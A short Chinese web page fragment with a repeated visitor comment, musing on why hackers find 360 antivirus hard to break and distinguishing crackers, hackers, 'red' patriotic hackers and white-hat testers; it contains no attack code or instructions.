    黑客为什么很难攻破360道高一丈魔高一丈,但杀软也不是傻子,现在的云防御等技术已经非常难攻破了,而且它们并不是都是坏的,骇客就是专门破坏的,黑客是指网络高手或维护人员,红客指爱国

  • avatar
    访客 2023-03-20 下午 09:13:39

    黑客为什么很难攻破360道高一丈魔高一丈,但杀软也不是傻子,现在的云防御等技术已经非常难攻破了,而且它们并不是都是坏的,骇客就是专门破坏的,黑客是指网络高手或维护人员,红客指爱国的黑客,白帽黑客是在网上帮各种网站进行善意的入侵,就是帮助它们找到

发表评论